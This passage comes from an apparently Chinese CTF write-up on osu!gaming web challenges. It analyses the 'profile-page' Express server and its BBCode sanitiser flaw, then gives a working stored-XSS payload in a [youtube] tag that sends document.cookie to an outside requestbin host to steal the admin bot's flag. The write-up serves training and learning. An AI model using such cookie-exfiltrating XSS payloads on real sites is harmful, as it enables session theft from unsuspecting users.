!password || <span class="keyword">typeof</span> password !== <span class="string">&quot;string&quot;</span>) &#123;</span><br><span class="line">        <span class="keyword">return</span> res.<span class="title function_">end</span>(<span class="string">&quot;missing username or password&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> (!users.<span class="title function_">has</span>(username)) &#123;</span><br><span class="line">        <span class="keyword">return</span> res.<span class="title function_">end</span>(<span class="string">&quot;no user exists with that username&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> (users.<span class="title function_">get</span>(username).<span class="property">password</span> !== <span class="title function_">sha256</span>(password)) &#123;</span><br><span class="line">        <span class="keyword">return</span> res.<span class="title function_">end</span>(<span class="string">&quot;invalid password&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    req.<span class="property">session</span>.<span class="property">user</span> = username;</span><br><span class="line">    res.<span class="title function_">cookie</span>(<span class="string">&quot;csrf&quot;</span>, crypto.<span class="title function_">randomBytes</span>(<span class="number">32</span>).<span class="title function_">toString</span>(<span class="string">&quot;hex&quot;</span>));</span><br><span class="line">    res.<span class="title function_">redirect</span>(<span class="string">&quot;/profile/&quot;</span> + username);</span><br><span class="line">&#125;);</span><br><span class="line"></span><br><span class="line"><span class="comment">// <span class="doctag">TODO:</span> update bio from UI</span></span><br><span class="line">app.<span class="title function_">post</span>(<span class="string">&quot;/api/update&quot;</span>, requiresLogin, <span class="function">(<span class="params">req, res</span>) =&gt;</span> &#123;</span><br><span class="line">    <span class="keyword">const</span> &#123; bio &#125; = req.<span class="property">body</span>;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> (!bio || <span class="keyword">typeof</span> bio !== <span class="string">&quot;string&quot;</span>) &#123;</span><br><span class="line">        <span class="keyword">return</span> res.<span class="title function_">end</span>(<span class="string">&quot;missing bio&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> (!req.<span class="property">headers</span>.<span class="property">csrf</span>) &#123;</span><br><span class="line">        <span class="keyword">return</span> res.<span class="title function_">end</span>(<span class="string">&quot;missing csrf token&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> (req.<span class="property">headers</span>.<span class="property">csrf</span> !== req.<span class="property">cookies</span>.<span class="property">csrf</span>) &#123;</span><br><span class="line">        <span class="keyword">return</span> res.<span class="title function_">end</span>(<span class="string">&quot;invalid csrf token&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> (bio.<span class="property">length</span> &gt; <span class="number">2048</span>) &#123;</span><br><span class="line">        <span class="keyword">return</span> res.<span class="title function_">end</span>(<span class="string">&quot;bio too long&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    req.<span class="property">user</span>.<span class="property">bio</span> = <span class="title function_">renderBio</span>(bio);</span><br><span class="line">    res.<span class="title function_">send</span>(<span class="string">`Bio updated!`</span>);</span><br><span class="line">&#125;);</span><br><span class="line"></span><br><span class="line">app.<span class="title function_">get</span>(<span class="string">&quot;/login&quot;</span>, <span class="function">(<span class="params">req, res</span>) =&gt;</span> res.<span class="title function_">render</span>(<span class="string">&quot;login&quot;</span>));</span><br><span class="line">app.<span class="title function_">get</span>(<span class="string">&quot;/register&quot;</span>, <span class="function">(<span class="params">req, res</span>) =&gt;</span> res.<span class="title function_">render</span>(<span class="string">&quot;register&quot;</span>));</span><br><span class="line">app.<span class="title function_">get</span>(<span class="string">&quot;/profile&quot;</span>, requiresLogin, <span class="function">(<span class="params">req, res</span>) =&gt;</span> res.<span class="title function_">redirect</span>(<span class="string">&quot;/profile/&quot;</span> + req.<span class="property">user</span>.<span class="property">username</span>));</span><br><span class="line">app.<span class="title function_">get</span>(<span class="string">&quot;/profile/:user&quot;</span>, <span class="function">(<span class="params">req, res</span>) =&gt;</span> &#123;</span><br><span class="line">    <span class="keyword">const</span> &#123; user &#125; = req.<span class="property">params</span>;</span><br><span class="line">    <span class="keyword">if</span> (!users.<span class="title function_">has</span>(user)) &#123;</span><br><span class="line">        <span class="keyword">return</span> res.<span class="title function_">end</span>(<span class="string">&quot;no user exists with that username!&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line">    res.<span class="property">locals</span>.<span class="property">user</span> = users.<span class="title function_">get</span>(user);</span><br><span class="line">    res.<span class="title function_">render</span>(<span class="string">&quot;profile&quot;</span>);</span><br><span class="line">&#125;);</span><br><span class="line"></span><br><span class="line">app.<span class="title function_">get</span>(<span class="string">&quot;/&quot;</span>, <span class="function">(<span class="params">req, res</span>) =&gt;</span> res.<span class="title function_">redirect</span>(<span class="string">&quot;/profile&quot;</span>));</span><br><span class="line"></span><br><span class="line">app.<span class="title function_">get</span>(<span class="string">&#x27;*&#x27;</span>, <span class="function">(<span class="params">req, res</span>) =&gt;</span> &#123;</span><br><span class="line">    res.<span class="title function_">set</span>(<span class="string">&quot;Content-Type&quot;</span>, <span class="string">&quot;text/plain&quot;</span>);</span><br><span class="line">    res.<span class="property">status</span> = <span class="number">404</span>;</span><br><span class="line">    res.<span class="title function_">send</span>(<span class="string">`Error: <span class="subst">$&#123;req.originalUrl&#125;</span> was not found`</span>);</span><br><span class="line">&#125;);</span><br><span class="line"></span><br><span class="line">app.<span class="title function_">listen</span>(<span class="variable constant_">PORT</span>, <span class="function">() =&gt;</span> <span class="variable language_">console</span>.<span class="title function_">log</span>(<span class="string">`web/profile-page listening at http://localhost:<span class="subst">$&#123;PORT&#125;</span>`</span>));</span><br></pre></td></tr></table></figure>

<p>这个是登录注册的源码，里面有三个api路由和一个用户界面，每个路由进行分析</p>
<p>(虽然一眼看过去就知道是上面<code>data.replaceAll</code>有问题，但是因为代码审计能力太弱了，完全没有看见，导致做了将近两个小时，还是通过一点点非预期才看见的，谢罪了)</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br></pre></td><td class="code"><pre><span class="line">app.<span class="title function_">post</span>(<span class="string">&quot;/api/register&quot;</span>, <span class="function">(<span class="params">req, res</span>) =&gt;</span> &#123;</span><br><span class="line">    <span class="keyword">const</span> &#123; username, password &#125; = req.<span class="property">body</span>;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> (!username || <span class="keyword">typeof</span> username !== <span class="string">&quot;string&quot;</span> || !password || <span class="keyword">typeof</span> password !== <span class="string">&quot;string&quot;</span>) &#123;</span><br><span class="line">        <span class="keyword">return</span> res.<span class="title function_">end</span>(<span class="string">&quot;missing username or password&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line">    </span><br><span class="line">    <span class="keyword">if</span> (username.<span class="property">length</span> &lt; <span class="number">5</span> || password.<span class="property">length</span> &lt; <span class="number">8</span>) &#123;</span><br><span class="line">        <span class="keyword">return</span> res.<span class="title function_">end</span>(<span class="string">&quot;username or password too short&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> (username.<span class="property">length</span> &gt; <span class="number">30</span> || <span class="regexp">/[^A-Za-z0-9 ]/</span>.<span class="title function_">test</span>(username)) &#123;</span><br><span class="line">        <span class="keyword">return</span> res.<span class="title function_">end</span>(<span class="string">&quot;invalid username format&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> (users.<span class="title function_">has</span>(username)) &#123;</span><br><span class="line">        <span class="keyword">return</span> res.<span class="title function_">end</span>(<span class="string">&quot;a user already exists with that username&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    users.<span class="title function_">set</span>(username, &#123;</span><br><span class="line">        username,</span><br><span class="line">        <span class="attr">password</span>: <span class="title function_">sha256</span>(password),</span><br><span class="line">        <span class="attr">bio</span>: <span class="title function_">renderBio</span>(<span class="string">`Welcome to <span class="subst">$&#123;username&#125;</span>&#x27;s page!`</span>)</span><br><span class="line">    &#125;);</span><br><span class="line"></span><br><span class="line">    req.<span class="property">session</span>.<span class="property">user</span> = username;</span><br><span class="line">    res.<span class="title function_">cookie</span>(<span class="string">&quot;csrf&quot;</span>, crypto.<span class="title function_">randomBytes</span>(<span class="number">32</span>).<span class="title function_">toString</span>(<span class="string">&quot;hex&quot;</span>));</span><br><span class="line">    res.<span class="title function_">redirect</span>(<span class="string">&quot;/profile/&quot;</span> + username);</span><br><span class="line">&#125;);</span><br></pre></td></tr></table></figure>

<p>注册的api限制了用户名长度(5,30)，且只能有数字字母，且用户名不能和别人重复，密码长度大于8，并且将用户名解析在bio中(没有xss的经验让我找了快半小时only数字字母xss的技巧无果才看其他地方的)</p>
<p>然后是登录</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line">app.<span class="title function_">post</span>(<span class="string">&quot;/api/login&quot;</span>, <span class="function">(<span class="params">req, res</span>) =&gt;</span> &#123;</span><br><span class="line">    <span class="keyword">const</span> &#123; username, password &#125; = req.<span class="property">body</span>;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> (!username || <span class="keyword">typeof</span> username !== <span class="string">&quot;string&quot;</span> || !password || <span class="keyword">typeof</span> password !== <span class="string">&quot;string&quot;</span>) &#123;</span><br><span class="line">        <span class="keyword">return</span> res.<span class="title function_">end</span>(<span class="string">&quot;missing username or password&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> (!users.<span class="title function_">has</span>(username)) &#123;</span><br><span class="line">        <span class="keyword">return</span> res.<span class="title function_">end</span>(<span class="string">&quot;no user exists with that username&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> (users.<span class="title function_">get</span>(username).<span class="property">password</span> !== <span class="title function_">sha256</span>(password)) &#123;</span><br><span class="line">        <span class="keyword">return</span> res.<span class="title function_">end</span>(<span class="string">&quot;invalid password&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    req.<span class="property">session</span>.<span class="property">user</span> = username;</span><br><span class="line">    res.<span class="title function_">cookie</span>(<span class="string">&quot;csrf&quot;</span>, crypto.<span class="title function_">randomBytes</span>(<span class="number">32</span>).<span class="title function_">toString</span>(<span class="string">&quot;hex&quot;</span>));</span><br><span class="line">    res.<span class="title function_">redirect</span>(<span class="string">&quot;/profile/&quot;</span> + username);</span><br><span class="line">&#125;);</span><br></pre></td></tr></table></figure>

<p>就是检测map中值对应是否正确，没有想到可以利用的地方</p>
<p>最后是关键的<code>/api/update</code></p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// <span class="doctag">TODO:</span> update bio from UI</span></span><br><span class="line">app.<span class="title function_">post</span>(<span class="string">&quot;/api/update&quot;</span>, requiresLogin, <span class="function">(<span class="params">req, res</span>) =&gt;</span> &#123;</span><br><span class="line">    <span class="keyword">const</span> &#123; bio &#125; = req.<span class="property">body</span>;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> (!bio || <span class="keyword">typeof</span> bio !== <span class="string">&quot;string&quot;</span>) &#123;</span><br><span class="line">        <span class="keyword">return</span> res.<span class="title function_">end</span>(<span class="string">&quot;missing bio&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> (!req.<span class="property">headers</span>.<span class="property">csrf</span>) &#123;</span><br><span class="line">        <span class="keyword">return</span> res.<span class="title function_">end</span>(<span class="string">&quot;missing csrf token&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> (req.<span class="property">headers</span>.<span class="property">csrf</span> !== req.<span class="property">cookies</span>.<span class="property">csrf</span>) &#123;</span><br><span class="line">        <span class="keyword">return</span> res.<span class="title function_">end</span>(<span class="string">&quot;invalid csrf token&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> (bio.<span class="property">length</span> &gt; <span class="number">2048</span>) &#123;</span><br><span class="line">        <span class="keyword">return</span> res.<span class="title function_">end</span>(<span class="string">&quot;bio too long&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    req.<span class="property">user</span>.<span class="property">bio</span> = <span class="title function_">renderBio</span>(bio);</span><br><span class="line">    res.<span class="title function_">send</span>(<span class="string">`Bio updated!`</span>);</span><br><span class="line">&#125;);</span><br></pre></td></tr></table></figure>

<p>会把update的bio显示在ui上，并且除了<code>DOMPurify</code>没有任何限制，那么显然注入点就在这里了</p>
<p>跟着分析，我们需要构造的bio，看看这个修改bio的函数<code>renderBio()</code></p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">const</span> <span class="title function_">renderBBCode</span> = (<span class="params">data</span>) =&gt; &#123;</span><br><span class="line">    data = data.<span class="title function_">replaceAll</span>(<span class="regexp">/\[b\](.+?)\[\/b\]/g</span>, <span class="string">&#x27;&lt;strong&gt;$1&lt;/strong&gt;&#x27;</span>);</span><br><span class="line">    data = data.<span class="title function_">replaceAll</span>(<span class="regexp">/\[i\](.+?)\[\/i\]/g</span>, <span class="string">&#x27;&lt;i&gt;$1&lt;/i&gt;&#x27;</span>);</span><br><span class="line">    data = data.<span class="title function_">replaceAll</span>(<span class="regexp">/\[u\](.+?)\[\/u\]/g</span>, <span class="string">&#x27;&lt;u&gt;$1&lt;/u&gt;&#x27;</span>);</span><br><span class="line">    data = data.<span class="title function_">replaceAll</span>(<span class="regexp">/\[strike\](.+?)\[\/strike\]/g</span>, <span class="string">&#x27;&lt;strike&gt;$1&lt;/strike&gt;&#x27;</span>);</span><br><span class="line">    data = data.<span class="title function_">replaceAll</span>(<span class="regexp">/\[color=#([0-9a-f]&#123;6&#125;)\](.+?)\[\/color\]/g</span>, <span class="string">&#x27;&lt;span style=&quot;color: #$1&quot;&gt;$2&lt;/span&gt;&#x27;</span>);</span><br><span class="line">    data = data.<span class="title function_">replaceAll</span>(<span class="regexp">/\[size=(\d+)\](.+?)\[\/size\]/g</span>, <span class="string">&#x27;&lt;span style=&quot;font-size: $1px&quot;&gt;$2&lt;/span&gt;&#x27;</span>);</span><br><span class="line">    data = data.<span class="title function_">replaceAll</span>(<span class="regexp">/\[url=(.+?)\](.+?)\[\/url\]/g</span>, <span class="string">&#x27;&lt;a href=&quot;$1&quot;&gt;$2&lt;/a&gt;&#x27;</span>);</span><br><span class="line">    data = data.<span class="title function_">replaceAll</span>(<span class="regexp">/\[img\](.+?)\[\/img\]/g</span>, <span class="string">&#x27;&lt;img src=&quot;$1&quot; /&gt;&#x27;</span>);</span><br><span class="line">    <span class="keyword">return</span> data;</span><br><span class="line">&#125;;</span><br><span class="line"><span class="keyword">const</span> <span class="title function_">renderBio</span> = (<span class="params">data</span>) =&gt; &#123;</span><br><span class="line">    <span class="keyword">const</span> html = <span class="title function_">renderBBCode</span>(data);</span><br><span class="line">    <span class="keyword">const</span> sanitized = purify.<span class="title function_">sanitize</span>(html);</span><br><span class="line">    <span class="comment">// do this after sanitization because otherwise iframe will be removed</span></span><br><span class="line">    <span class="keyword">return</span> sanitized.<span class="title function_">replaceAll</span>(</span><br><span class="line">        <span class="regexp">/\[youtube\](.+?)\[\/youtube\]/g</span>,</span><br><span class="line">        <span class="string">&#x27;&lt;iframe sandbox=&quot;allow-scripts&quot; width=&quot;640px&quot; height=&quot;480px&quot; src=&quot;https://www.youtube.com/embed/$1&quot; frameborder=&quot;0&quot; allowfullscreen&gt;&lt;/iframe&gt;&#x27;</span></span><br><span class="line">    );</span><br><span class="line">&#125;;</span><br></pre></td></tr></table></figure>

<p>会把固定格式替换成html标签，下面就简单了，闭合一下$1处的引号，构造payload尝试一下</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">[youtube]1&quot; onload=&quot;alert(1);[/youtube]</span><br></pre></td></tr></table></figure>

<p>控制台发送请求</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">await</span> <span class="title function_">fetch</span>(<span class="string">&#x27;/api/update&#x27;</span>,&#123;</span><br><span class="line">    <span class="attr">method</span>: <span class="string">&#x27;POST&#x27;</span>,</span><br><span class="line">    <span class="attr">headers</span>: &#123;</span><br><span class="line">        <span class="attr">csrf</span>: <span class="string">&#x27;ed25eb2240494098879f95bef00d39940737a10165d90a1f9c2dbe8235fe3cf5&#x27;</span>,</span><br><span class="line">        <span class="string">&#x27;content-type&#x27;</span>: <span class="string">&#x27;application/x-www-form-urlencoded&#x27;</span></span><br><span class="line">    &#125;,</span><br><span class="line">    <span class="attr">body</span>: <span class="keyword">new</span> <span class="title class_">URLSearchParams</span>(&#123;</span><br><span class="line">        <span class="attr">bio</span>: <span class="string">&#x27;[youtube]11&quot; onload=&quot;alert(1)&quot; [/youtube]&#x27;</span></span><br><span class="line">    &#125;).<span class="title function_">toString</span>()</span><br><span class="line">&#125;).<span class="title function_">then</span>(<span class="function"><span class="params">r</span>=&gt;</span>r.<span class="title function_">text</span>())</span><br></pre></td></tr></table></figure>

<p>弹窗成功</p>
<p>接下来就简单看一下机器人</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">//adminbot_test.js</span></span><br><span class="line"><span class="comment">// admin bot test script</span></span><br><span class="line"><span class="comment">// npm i puppeteer</span></span><br><span class="line"><span class="keyword">const</span> puppeteer = <span class="built_in">require</span>(<span class="string">&quot;puppeteer&quot;</span>);</span><br><span class="line"></span><br><span class="line"><span class="keyword">const</span> <span class="variable constant_">FLAG</span> = <span class="string">&quot;osu&#123;test_flag&#125;&quot;</span>;</span><br><span class="line"><span class="keyword">const</span> <span class="variable constant_">SITE</span> = <span class="string">&quot;https://profile-page.web.osugaming.lol&quot;</span>;</span><br><span class="line"></span><br><span class="line"><span class="keyword">const</span> <span class="title function_">sleep</span> = ms =&gt; <span class="keyword">new</span> <span class="title class_">Promise</span>(<span class="function"><span class="params">r</span> =&gt;</span> <span class="built_in">setTimeout</span>(r, ms));</span><br><span class="line"></span><br><span class="line"><span class="keyword">async</span> <span class="keyword">function</span> <span class="title function_">visit</span>(<span class="params">url</span>) &#123;</span><br><span class="line">    <span class="keyword">let</span> browser;</span><br><span class="line">    <span class="keyword">try</span> &#123;</span><br><span class="line">        browser = <span class="keyword">await</span> puppeteer.<span class="title function_">launch</span>(&#123;</span><br><span class="line">            <span class="attr">headless</span>: <span class="literal">true</span>,</span><br><span class="line">            <span class="attr">pipe</span>: <span class="literal">true</span>,</span><br><span class="line">            <span class="attr">args</span>: [</span><br><span class="line">                <span class="string">&quot;--no-sandbox&quot;</span>,</span><br><span class="line">                <span class="string">&quot;--disable-setuid-sandbox&quot;</span>,</span><br><span class="line">                <span class="string">&quot;--js-flags=--noexpose_wasm,--jitless&quot;</span>,</span><br><span class="line">            ],</span><br><span class="line">            <span class="attr">dumpio</span>: <span class="literal">true</span></span><br><span class="line">        &#125;);</span><br><span class="line"></span><br><span class="line">        <span class="keyword">let</span> page = <span class="keyword">await</span> browser.<span class="title function_">newPage</span>();</span><br><span class="line">        <span class="keyword">await</span> page.<span class="title function_">goto</span>(<span class="variable constant_">SITE</span>, &#123; <span class="attr">timeout</span>: <span class="number">3000</span>, <span class="attr">waitUntil</span>: <span class="string">&#x27;domcontentloaded&#x27;</span> &#125;);</span><br><span class="line"></span><br><span class="line">        <span class="keyword">await</span> page.<span class="title function_">evaluate</span>(<span class="function">(<span class="params">flag</span>) =&gt;</span> &#123;</span><br><span class="line">            <span class="variable language_">document</span>.<span class="property">cookie</span> = <span class="string">&quot;flag=&quot;</span> + flag + <span class="string">&quot;; secure; path=/&quot;</span>;</span><br><span class="line">        &#125;, <span class="variable constant_">FLAG</span>);</span><br><span class="line"></span><br><span class="line">        <span class="keyword">await</span> page.<span class="title function_">close</span>();</span><br><span class="line">        page = <span class="keyword">await</span> browser.<span class="title function_">newPage</span>();</span><br><span class="line"></span><br><span class="line">        <span class="keyword">await</span> page.<span class="title function_">goto</span>(url, &#123; <span class="attr">timeout</span>: <span class="number">3000</span>, <span class="attr">waitUntil</span>: <span class="string">&#x27;domcontentloaded&#x27;</span> &#125;)</span><br><span class="line">        <span class="keyword">await</span> <span class="title function_">sleep</span>(<span class="number">5000</span>);</span><br><span class="line"></span><br><span class="line">        <span class="keyword">await</span> browser.<span class="title function_">close</span>();</span><br><span class="line">        browser = <span class="literal">null</span>;</span><br><span class="line">    &#125; <span class="keyword">catch</span> (err) &#123;</span><br><span class="line">        <span class="variable language_">console</span>.<span class="title function_">log</span>(err);</span><br><span class="line">    &#125; <span class="keyword">finally</span> &#123;</span><br><span class="line">        <span class="keyword">if</span> (browser) <span class="keyword">await</span> browser.<span class="title function_">close</span>();</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="title function_">visit</span>(<span class="string">&quot;EXPLOIT_URL&quot;</span>);</span><br></pre></td></tr></table></figure>

<p>机器人直接把flag写在cookie里，访问一下应该就有了</p>
<p>接下来就是找个站接收，推荐用这个站<a target="_blank" rel="noopener" href="https://pipedream.com/requestbin">https://pipedream.com/requestbin</a></p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">await</span> <span class="title function_">fetch</span>(<span class="string">&#x27;/api/update&#x27;</span>,&#123;</span><br><span class="line">    <span class="attr">method</span>: <span class="string">&#x27;POST&#x27;</span>,</span><br><span class="line">    <span class="attr">headers</span>: &#123;</span><br><span class="line">        <span class="attr">csrf</span>: <span class="string">&#x27;ed25eb2240494098879f95bef00d39940737a10165d90a1f9c2dbe8235fe3cf5&#x27;</span>,</span><br><span class="line">        <span class="string">&#x27;content-type&#x27;</span>: <span class="string">&#x27;application/x-www-form-urlencoded&#x27;</span></span><br><span class="line">    &#125;,</span><br><span class="line">    <span class="attr">body</span>: <span class="keyword">new</span> <span class="title class_">URLSearchParams</span>(&#123;</span><br><span class="line">        <span class="attr">bio</span>: <span class="string">&#x27;[youtube]11&quot; onload=&quot;fetch(`https://eonngzestk4l8vk.m.pipedream.net/`)&quot; [/youtube]&#x27;</span></span><br><span class="line">    &#125;).<span class="title function_">toString</span>()</span><br><span class="line">&#125;).<span class="title function_">then</span>(<span class="function"><span class="params">r</span>=&gt;</span>r.<span class="title function_">text</span>())</span><br></pre></td></tr></table></figure>

<p>然后把用户页面丢到机器人那里，发现并没有把cookie带出来，修改一下payload，让url把cookie带回来</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">await</span> <span class="title function_">fetch</span>(<span class="string">&#x27;/api/update&#x27;</span>,&#123;</span><br><span class="line">    <span class="attr">method</span>: <span class="string">&#x27;POST&#x27;</span>,</span><br><span class="line">    <span class="attr">headers</span>: &#123;</span><br><span class="line">        <span class="attr">csrf</span>: <span class="string">&#x27;ed25eb2240494098879f95bef00d39940737a10165d90a1f9c2dbe8235fe3cf5&#x27;</span>,</span><br><span class="line">        <span class="string">&#x27;content-type&#x27;</span>: <span class="string">&#x27;application/x-www-form-urlencoded&#x27;</span></span><br><span class="line">    &#125;,</span><br><span class="line">    <span class="attr">body</span>: <span class="keyword">new</span> <span class="title class_">URLSearchParams</span>(&#123;</span><br><span class="line">        <span class="attr">bio</span>: <span class="string">&#x27;[youtube]11&quot; onload=&quot;fetch(`https://eonngzestk4l8vk.m.pipedream.net/`+document.cookie)&quot; [/youtube]&#x27;</span></span><br><span class="line">    &#125;).<span class="title function_">toString</span>()</span><br><span class="line">&#125;).<span class="title function_">then</span>(<span class="function"><span class="params">r</span>=&gt;</span>r.<span class="title function_">text</span>())</span><br></pre></td></tr></table></figure>

<p>成功得到flag</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">osu&#123;but_all_i_w4nted_to_do_was_w4tch_y0utube...&#125;</span><br></pre></td></tr></table></figure>


<p>至于说上面的一点点非预期，简单解释一下，因为是公共靶机，你可以通过公共靶机访问别人创建的任何账号，并且<strong>没有任何检查限制</strong>，幸运的我尝试的第一个用户(111111111)就是成功的，访问了之后发现他用户信息那边有图片，好奇怎么插入图片的，就找到了bio，我一开始还看不懂bio是什么，最后就顺藤摸瓜了做了出来&#x3D; &#x3D;</p>
<h2 id="stream-vs-79-solves-138-points"><a href="#stream-vs-79-solves-138-points" class="headerlink" title="stream-vs(79 solves &#x2F; 138 points)"></a><strong>stream-vs</strong>(79 solves &#x2F; 138 points)</h2><p><a target="_blank" rel="noopener" href="https://stream-vs.web.osugaming.lol/">https://stream-vs.web.osugaming.lol/</a></p>
<p>里面是一个小游戏，一开始没搞懂什么意思，简单玩了一会发现是点击频率要和bpm一样，然后打败cookiezi获得flag，这时候就需要写脚本了</p>
<p>直接执行肯定会慢几拍，所以需要从开始就执行，可以用js的WebSocket访问执行，然后读取bpm然后模拟，下面给出代码（晨曦大佬写的脚本）</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">let</span> ws = <span 